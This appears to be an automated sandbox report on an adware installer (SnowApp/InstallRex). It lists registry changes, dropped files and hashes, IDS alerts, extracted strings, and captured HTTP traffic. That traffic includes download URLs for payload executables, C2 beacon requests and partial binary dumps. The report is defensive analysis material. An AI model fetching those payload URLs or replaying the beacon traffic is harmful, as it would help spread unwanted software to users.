"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"a0743acc" = "N/////%%"
"c6c5dd44" = "V/////%%"
"1520c6f1" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"a2e3b941" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
"f1f24e29" = "Vl/l/C/////%"
"f2c53c49" = "UlAr/XJ/c//k////"
"c24899a6" = "Vx/g/CD/Mx////%%"
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"48bd1aff" = "V/////%%"
"c99a5f5c" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D D4 AC FF F5 92 0C D7 84 BB 2F A7 D9 05 25 80"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_24c54e38\eae10f9d]
"2e22d94e" = "///%"
"3c09c42b" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"bbf88800" = "///%"
"72758a5d" = "///%"
"51d2f2ea" = "JlA3/YV/c/Au/Xh/J/Af/X6/a/Ak/X2/GlAu/YZ////%"
"d1abcdb6" = "///%"
"27ddcf6f" = "///%"
"7f69fa1f" = "///%"

Dropped PE files

MD5 File path
c28c3116543d19ffee5966b48581b7ed c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll
e717f6ce3a7429bfa6d7f3cf66737a4b c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe
af7ce801c8471c5cd19b366333c153c4 c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\TsuDll.dll
aef1a3ee471bad9c1afdd55d8393022a c:\Documents and Settings\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll
deba33db167548f8bbac30f5d78eb168 c:\Documents and Settings\All Users\Application Data\SnowApp\SystemProlonger\SystemProlonger.exe
6e89f4b401bcccc256e1cc3b4fdf7538 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\DeltaFix[1].exe
deba33db167548f8bbac30f5d78eb168 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\agup[1].exe
5ce98607a87161745eff43f9bf6fb35e c:\Program Files\DeltaFix\DeltaFix.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: SnowApp
Product Name: SnowApp
Product Version: 1.0.0.3
Legal Copyright: Copyright (c) 2014 SnowApp
Legal Trademarks:
Original Filename: TSULoader.exe
Internal Name: TSULoader
File Version: 2014.3.11.1505
File Description: Installer for SnowApp
Comments: WinNT (x86) Unicode Lib Rel
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 7672 7680 4.5056 b1ae6dcdc3a7ba319c6d5e0b1a2eadbc
.rdata 12288 1794 2048 3.26018 cd4f20f041a2da05dfe5974fe61bd4ec
.data 16384 1040 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 20480 8288 8704 2.75811 be877d4afa5e8f40b68552c522aaa393
.reloc 32768 348 512 2.09579 938152484b33bca77bd622973abb524e
.tsustub 36864 120967 121344 5.54288 df422ecdecc6d2491d6afa0ac3da5332
.tsuarch 159744 176128 176128 5.54408 2f694139e897b2022d22b692668603c8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1116
5613b2d7ce461549521ad75726f1760f
1ac90fa0c5905941ac6c9fc1f0d83a03
840739afa3bf7fbe849b2b98ffdab2b1
faf30c2a11068ba7827ab08a0a3992cc
2712062e1b9ea46febcf9d7fa1a1ac56
16a774acac0c501e19036e588740ed2e
6b7acb3850d9a8c45498f5038b3fcc37
adce6ad99bbb3ee8c8a441cdd4f51d54
6e9814b1b77103c9ff640325a63dbf3a
dcc6e2cdf8dcda21bbef722a393ab477
c4516cb132c4367800a63e84c7bb7921
da19dd6be4f29dc92f23aa5597ee5396
db23bab0216e292b67745cad042b6e34
66ca5c803e0d0c008a2a439d842b86a7
02934cfa9419fc2d16b5dee015fa918c
bfc7978f2e50d2fefa3800cc35b37b10
bc495f098917b3b4d4a541dbe85fdd41
4188c549ebdf5409384ac00c2007edfe
d26fe8ba265f7a66247ac504b54da3e2
d2a1e771272e5c336acdbae92202747a
c2c19944526231395b4cb8fa858e6e3a
43e0d03477c3e5be3b246a94f614af5e
c076a18d4521d5e553c46c1781f5ccf6
5274697854f924bd45be01a86bdbdcdd
27d5bbd860298692288ce26eea1d09c0

URLs

URL IP
hxxp://getapplicationmy.info/?report_version=5&
hxxp://getapplicationmy.info/?step_id=1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A
hxxp://webhomeusa.info/DeltaFix.exe 54.68.119.243
hxxp://cnnintl-56m.gslb.vgtf.net/
hxxp://techine.info/get/?data=Ea/L5UVwLYSXbKdG+xSC1ZMmU2dX2NtPlTdeDQZBlSh0EnzIs83wmYHhAIR5XkEgk0AeaImOCqrUU09WiJ9nROfBu4aYbSIDIEUGvOb5vRSVkPUfKpXld5uMcXrYRZ05wtdW0RfcEfoYwjxKaREsrFsEJUswLM2MFEiqz43XPu0YYffaYfN0Gq5IJZISowp4Pt0B/f9Jd/wmvUYeI9SdO1tMBNH7NQOI53krPYw9F02YFjKz0K9cxZG2cfdnhhBiR6whpnywhNaGKraHn+y5hBADk+wXenjVuBrY6uWrDXVccBEkoOXb6s1Z59uqAb9Eem/4ri5DqdNnZw3K+zbk5eyfT7Z+OKTwW9nthJxGvrBSy7i4gmqYRvWXy7uhFazvJYi1zXKkY7eqP8u8VQtLDVWAFQxznaUHyP1HqyB//xhn/ZMO2uhnqAuq0u2Mi7c3ll7euVk9MSUO5P9rK6/6Lf3ZurUv2OBPNKhpPb2jlVFwIq08uHhlUfyC2H4oPvMDZGk+MXJ47VrerE1cu7GvBs6/QBC+1ffYz1ZCf9jxjhFrTDtMcXkKfR5eISoeDfzt&version=4 85.17.73.28
hxxp://getapplicationmy.info/?step_id=1_1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A
hxxp://i1.proffiiget.in/addons/agup.exe 198.7.61.118
hxxp://edition.cnn.com/ 157.166.248.13
hxxp://c1.getapplicationmy.info/?step_id=1_1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A 54.148.67.213
hxxp://r1.getapplicationmy.info/?report_version=5& 54.148.67.213
hxxp://c1.getapplicationmy.info/?step_id=1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A 54.148.67.213


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Report CnC Beacon
ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /?step_id=1_1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.getapplicationmy.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 16:00:07 GMT
Content-Type: text/html
Content-Length: 6794
Connection: close
Content-Disposition: attachment; filename="1_1.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".f.1.e.
0.0.b.2.d.-.2.5.5.1.-.4.5.9.b.-.8.5.e.4.-.e.2.1.5.7.0.4.4.5.9.1.6."...
P.u.b.l.i.s.h.e.r.I.D.=.".2.1.0.9."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.
e.I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".0."...I.n.s.t.a.l.l.e.r.I.D.
=.".3.5.4.9.8.3.5.6.2.0.6.6.9.8.8.9.0.9.6."...L.o.c.a.l.e.=.".<.L.a
.n.g.u.a.g.e.>."...D.a.t.e.=.".2.0.1.4./.1.1./.2.8."...T.i.m.e.=.".
1.6.:.0.0.:.0.7."...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.
e.e.n.s.=.".0."...R.u.n.O.n.c.e.=.".0."...L.o.g.U.r.l.=."."...L.o.g.S.
t.a.r.t.e.d.=."."...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.
e.n.d.R.e.p.o.r.t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=."."...
..[.S.e.r.v.e.r.]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.
e.r.I.n.f.o.]...C.o.u.n.t.r.y.C.o.d.e.=.".I.T."...I.P.A.d.d.r.e.s.s.=.
".1.8.4...1.0.7...3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.
d.G.e.n.]...P.e.r.c.e.n.t.a.g.e.=.".7.4.".....[.S.c.r.e.e.n.7.6.]...T.
i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.
t.t.o.n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:.
 .t.h.e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.
e.n... .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.
a.g.e. .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.
e.n.7.5.]...T.i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.
u.t.t.o.n.2.=.".N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?.
<<< skipped >>>


GET /get/?data=Ea/L5UVwLYSXbKdG+xSC1ZMmU2dX2NtPlTdeDQZBlSh0EnzIs83wmYHhAIR5XkEgk0AeaImOCqrUU09WiJ9nROfBu4aYbSIDIEUGvOb5vRSVkPUfKpXld5uMcXrYRZ05wtdW0RfcEfoYwjxKaREsrFsEJUswLM2MFEiqz43XPu0YYffaYfN0Gq5IJZISowp4Pt0B/f9Jd/wmvUYeI9SdO1tMBNH7NQOI53krPYw9F02YFjKz0K9cxZG2cfdnhhBiR6whpnywhNaGKraHn+y5hBADk+wXenjVuBrY6uWrDXVccBEkoOXb6s1Z59uqAb9Eem/4ri5DqdNnZw3K+zbk5eyfT7Z+OKTwW9nthJxGvrBSy7i4gmqYRvWXy7uhFazvJYi1zXKkY7eqP8u8VQtLDVWAFQxznaUHyP1HqyB//xhn/ZMO2uhnqAuq0u2Mi7c3ll7euVk9MSUO5P9rK6/6Lf3ZurUv2OBPNKhpPb2jlVFwIq08uHhlUfyC2H4oPvMDZGk+MXJ47VrerE1cu7GvBs6/QBC+1ffYz1ZCf9jxjhFrTDtMcXkKfR5eISoeDfzt&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Nov 2014 16:00:07 GMT
Content-Length: 0
Connection: close



GET /addons/agup.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.proffiiget.in


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Fri, 28 Nov 2014 15:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 773632
Last-Modified: Wed, 17 Sep 2014 09:31:05 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......p.).4.G.4.G.
4.G.R!..7.G.=...5.G.....z.G...../.G.......G.=...1.G.=...%.G.4.F...G.R!
..'.G.4.G.6.G.R!..5.G.R!..5.G.Rich4.G.........................PE..L...
.8.T..................................................................
...P......|m...............................................@..<....
........................................................k..@..........
.....$............................text............................... 
..`.rdata..............................@[email protected]...._.................
[email protected]...<....@......................@..@..............
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U...}..u.3.]..u.....
.Y].U...u......Y].U....\SVW.U....E..H..M..H8.M..H<[email protected]
..H....H..p K.].3.C.....M..H.K.e...M..H(.]..X0.M..H$.P4.M..H,.]..X..x.
.U..M..].#M..E.......M....P......s............C.].........;...........
... .......}...M...l...f..Q.].u..}..t3.M......DE..M.j...T...E.#E.Y*M..
..M.....i........]..M....sm...j.X.B. ..M.3.A............s..E..........
...E.........;.s........ ......f..... . ...... .f...A......r.......].;
]..U...#E. E..B..................... ..M.3..U.A...]...#]..].....U.
<<< skipped >>>


POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r1.getapplicationmy.info
Content-Length: 2002
Cache-Control: no-cache

data=jGPup5UJW2dJ2Hn9/X1Lyjoc0nvmVrKYbORo9nVaS6uGGbS0XnKroLYXz/h4xDNb0Z5Gi8SdueIJ97zwno3ydmMaoYZcoYLFE2NiGbNl0m3HoK7N8IqMsOAvp5A0tunMDovqCX4zJHO7r9qJffz6vmASywfuPLtDg3wBy79HB5n7dOGTVzS04f9OMV0mKslbDl+qwczerauMUi32N29FyBLcFr/1yrKxAJtx6hud1zDFoV42olwRm7DjtZ9eQQhGz8Wp3BMkyl1aiaOEfbB0OBRsBlvY7luJp8nFxyECTMYb9ImUvc1WLxaPz9XGLRn22YIhK148p4r1AU8sUwy/jToF2gBiC/Q84xK7K3HAe1sxR+2UL8UH8K+XAxON/CAH5tBbzMZbA/vhEeEoKW3KsBYvbq3Jeo05r1WHxphBNoHrx7U1tn99DXfVKh138v5LLlvnUlh3x7bRML+sSiJX9vDz0jV6GbJ0T/zWamL9WUK+dRZO7S2+uT+zN0zrmVmyJPTGo5YkfU+XdrUEnyNbhX731Y5/8plWKzuo2qo5FyRBY53kV+LmJWGDvnJDdTEg7MSZSA2KIYi9V/Zj51C4OuhDu+omgW4FpgowKrcxAOAQS4HZX8H/xm2pjH+Eqz/sVVJ4HQOOPNAla9+K+gslxqzxQLPH85O9DPWPOoZgYDvh587r0JyHnw1LDGZoVSI4vQDgYaqYgnStLtnDsOj2VYicyupZFTPO4iTywk80BGTlkBdBOIDMiey3Rt8LM7/APFb4/Dj6kn0RJRT+HeI2q9Fpco5wcW2BALx6c5LKzWTgCaMRVz7+gu4EBljLWMbJVmA/imN53tpi3w9UKem/KHu5txYEPuRd2Qq4ISfX9QA2MqwZwt53s5i2OGIYCoOElz92HWwDBZh2KVUwdzU3DKc+Ti7PrWwchOZQZN/bZhL0NNTkssp49EbpAlrsyMG+3pOmjRt5hsIbsDI5jKifuQ/YTdv3Xt/UM1+47YtzON0UIMaaDqqi9XPupxvKaHChjq5+PfO0P6os5wajtytrgFDsRykxI1+a9n590qXYPSLNgzD5vFVjyLTO2rAn7EXtgXS/zSvR2qu9pADB5ZfsLFlWid7+d4rvqVod7OGQJmkt2XXgfPuOXAkIE7zCcc3Ww1MS2TceREPl2OBqMdqresG709mw+5cgblWfwp5FO/8FXd2nC94jY29217IvNk1VTIApVNHxGcv4tGTEDorMIjOUbsBzwaXebVfYZta/DDjlOWECw9OaizRCuKvVceMALtpA5yVWu
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 16:00:10 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=1&installer_id=3549835620669889096&publisher_id=2109&source_id=0&page_id=0&affiliate_id=0&country_code=IT&locale=EN&browser_id=4&download_id=8128211262825159543&external_id=0&session_id=12819145616345161792&hardware_id=6517130317843606773&installer_file_name=Setup&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.getapplicationmy.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 15:59:47 GMT
Content-Type: text/html
Content-Length: 6534
Connection: close
Content-Disposition: attachment; filename="1.txt"
..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".e.c.f.
8.6.8.8.d.-.6.b.a.5.-.4.c.8.9.-.b.c.1.4.-.4.3.d.f.0.1.a.f.0.c.b.9."...
P.u.b.l.i.s.h.e.r.I.D.=.".2.1.0.9."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.
e.I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".0."...I.n.s.t.a.l.l.e.r.I.D.
=.".3.5.4.9.8.3.5.6.2.0.6.6.9.8.8.9.0.9.6."...L.o.c.a.l.e.=.".<.L.a
.n.g.u.a.g.e.>."...D.a.t.e.=.".2.0.1.4./.1.1./.2.8."...T.i.m.e.=.".
1.5.:.5.9.:.4.7."...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.
e.e.n.s.=.".0."...R.u.n.O.n.c.e.=.".0."...L.o.g.U.r.l.=."."...L.o.g.S.
t.a.r.t.e.d.=."."...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.
e.n.d.R.e.p.o.r.t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=."."...
..[.S.e.r.v.e.r.]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.
e.r.I.n.f.o.]...C.o.u.n.t.r.y.C.o.d.e.=.".I.T."...I.P.A.d.d.r.e.s.s.=.
".1.8.4...1.0.7...3.8...3.8."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.
d.G.e.n.]...P.e.r.c.e.n.t.a.g.e.=.".1.6.".....[.S.c.r.e.e.n.7.6.]...T.
i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.n."...B.u.
t.t.o.n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.o.r.r.y.:.
 .t.h.e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e. .b.r.o.k.
e.n... .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .h.o.m.e.p.
a.g.e. .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n..."...[.S.c.r.e.
e.n.7.5.]...T.i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.
u.t.t.o.n.2.=.".N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?.
<<< skipped >>>


HEAD / HTTP/1.1
Host: edition.cnn.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Nov 2014 16:00:00 GMT
Content-Type: text/html
Connection: close
Set-Cookie: CG=CA:QC:Montr.al; path=/
Last-Modified: Fri, 28 Nov 2014 15:59:18 GMT
Vary: Accept-Encoding
Cache-Control: max-age=60, private
Expires: Fri, 28 Nov 2014 16:00:50 GMT



POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r1.getapplicationmy.info
Content-Length: 1677
Cache-Control: no-cache

data=4jNsrbheGAkon4T6ysVMbDZB+OcI09sRBIE7XVptIKEt5VgG99bPKsV95XE63WT52Jsq5Ab04wRgZzAmq8X1DaFD39uexSTeImK3F+KzEoza2SetGNzicna5Ja3AMTxrMfRhb1aCKScRS+LLLk5EqKTKxz2Qv4n03Qnikw2Asb5oaw92hxY7WDzmSe+uyFysaF0z3OIRT7cIpzaecTkup84jfmb4o1dmEG4rtnOmmJdD0vYa7n4YZTQhkYy1xTXzIS//0Fderpn8MXZwz6GlD495rUh65YIXQv1RYb5nZF9/9ATuW7H+wLQq15PJFHIeZcl4t9IbP5vcyohr7Rhs1Zr/wfnkBQxu3Iks/8T8ItzjAUQl5FrRyuqNJteptcorGlohOuaqsp/5TP9viJFp0XLj8k8/2fHAEh0J7DMWuJ8J+md48q9JPwxxjMrgXj1ahV08Tbl0VrqWsSLt5xTYUCDgVk9/t3ldTW7V9H0MwQFECyzZg9vk2ouk0ByX/VwjyLYxhmNI2aVF8SIGXDf9wYq93PFmKdwu7Qam8shLnExLngygDiyXMExW+ARQOGUULwy6G0FIlW3XoztO8kiIe5pA2U+O05uKUTE5h64m0o5ZJ7AWRMtwXhRrePEElvsdcOArwXkpMDdl+k4VhgRmbjinMnfy4uCx7doxwFQmZQ3YLS4NOFtUCEAADL1vnIIgQCHI0R23&info=0EfMQnDSxfWymCqxztWP2nOtoOIyO2DDdz+EvMkvC1AyDhbmASbvJ3q1XlZMt+P5z2arDdUMBNoDrMr+OSy0qN3xXe66KObvQihU1wBQ1uEJeCRnpWOzeMbjkugyyA5luzmWjPOnSp+BSeyw8MBaENIhZmdEPBNPt237fcpgM/4pZw5g5Oq2+Xu8LtsVzLErHs1BCa24oBgiCgq9hGjQ15ag39BC8rEUNGSKvfjqnCY2nW1Y7/S03c/TMv+iL93nqc+r3UFmogo+5uwP90Z5hINEzlp3yCQmn4sHMsYJamwoReXBLTalr/L1scNim08/Mls1BSpe22SZA1058sjREq33HlyaRXgs7sWDriWpvoxeRvun8+3gsYOKgRVdAkGaF0fECcswCDDn1GSSUtUdgijqJoHWJickAidWTiuccDXchBefBEDHRH0bdxtQqoZakHiqp0y847GbR5YC1sKvgZ2qi2OCRSu11IfC+RO2EhAl9ynv/BJkD+3vhAMn/Usi1RiQTnfdP+3nVHiy5vvMcyEGOWEQL3Msu5r6+lko75sunsXFt/QfI5zt6oU
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 15:59:47 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /DeltaFix.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: webhomeusa.info


HTTP/1.1 200 OK
Server: openresty
Date: Fri, 28 Nov 2014 15:59:47 GMT
Content-Type: application/octet-stream
Content-Length: 6180864
Last-Modified: Fri, 28 Nov 2014 13:05:07 GMT
Connection: close
ETag: "54787303-5e5000"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........*I.myI.my
I.my...yd.my...yX.my...y,[email protected]/&.yH.myI.myB.my.$.yH.my.$
.yH.myRichI.my................PE..L...MexT......................V.4)..
.;............@...........................^.....2`^...@..............@
...................O..P.... ^......................0^.00..............
........................@............................................t
ext...$........................... ..`.rdata..........................
....@[email protected]..`[email protected]........ ^.......
].............@[email protected]^..t....].............@..@............
......................................................................
......................................................................
......................................................................
......................................................................
.............................................D$.....D$......@...@.....
......U..WV....u...e....5.....E............ff.........=.gg~.)=...u.2=q
.(..A=w...u.....u..ffff.........=.gg~u..........=...uu..E....u..4.E...
=:<....=r.(.u..I...=_q....=;<..u..E..A.....gg~.w...=......=`q...
.e....w....[...=.d....Q........*.w9.Y..?....r.(..5...S.......R".}9.[..
=.e............f.....=..3...=.5..........gg~.....=t..4..S.}.5L..R...9.
[..........f.....=u..4t:=...fu\...........e............e..E..0.E..8...
E.....f......W..........$.........R....]....r.(..c...=...f..X....w
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







rundll32.exe_512:




.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s

SystemProlonger.exe_1612:




.text
`.rdata
@.data
.rsrc
L$HQSShD`
QSSSSSSh
j.Yf;
_tcPVj@
.PjRW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
load x
qI3[0%s
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
EnumWindows
USER32.dll
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USERENV.dll
GetCPInfo
zcÁ
[]@%~!#$^&*()_-?|{}=:
/vABmeRfAuIUlkvobQhxXiDGwS02xn6H0U6DZCDHvIATNlPbpqpPOz1QGiLGMhTuXinBPsG7pT5nQKg97KEjbWMXt6UeZQ3NNhWSkbs0PFUOXeu7qBezPy6gssSHDhGJ
1JyR4HrFONIVXjDC3ceRt4KW5E58D1BdAX9AHUEsxBGQrkj2l4p0wTdBiE7AyjeDgvWK9VVq41NX09K0nnoHzGbVXNQNdpxZbKzI7sigiVjIeNRe8 D7f5nzkjv R2ij
DJG8iVLHF5/4R27dp4BElIKbN/KYkRKY7AbogR38oQlq2txqkyi1sKMR3UpmxdJxPe0HZ/DdKh6G/lUlRZH1/xerK5e7xun94PtKXn1pSjcmK1a5DK1XC7msG9iESCW1
4HrFQ J0KEY8b4oBZWCCb9J2PMsVPOlaLQ9moQOQoSEHORL 9OxkswsK3bpiEZ4fOxjain0oLy40kYhnKKs0deJGnSyjex/VA9ibPUrxX7Gs/Ay7bzRJsCrHQSGYORaa
4H5dKFe wAXj6ynku/N94HrFR273xIi0IAGzz55vz8HIL 0 apXImYhvAzmlpZRXSjcmEeDdVg4C 9RaF0sQlNnsjMyL5da53 cNpd0KlFJb22sElQvaM4mT8PvEN057
20120606
:2RP.aN
vcrT"?y
.D@%D~
@%.wQ
PU.xV;E
f.yrf3
iZ.pR
GW%Cw
<-r}?
:sB-.hK
H.gNQB#
.Ae>W
%.av s,
%-K}E
vH.ye
2%x/z
d{|%F
.UHnf(
pmva'.Prg
g5Zy%X
.LGhx
sQln<uYTN
lŒ2s
Ä{d
`D%Cs2
%o.kE
.gifUl
dd%C#
7.ykC(
a*W*%u?F
%U_;p
c:\documents and settings\all users\application data\snowapp\systemprolonger\SystemProlonger.exe
?456789:;<=
!"#$%&'()* ,-./0123
'()*#$%&
>?:;<=9876540123,-./
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<!--Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<!--Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
portuguese-brazilian
%s\%s
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
_dlsys->%s is null
ProductSupport
log.txt
AG%d%s
access out of bounds index %d not in 0..%d
UInfoURL
E:%u LookupPrivValue
E:%u AdjustTokenPriv
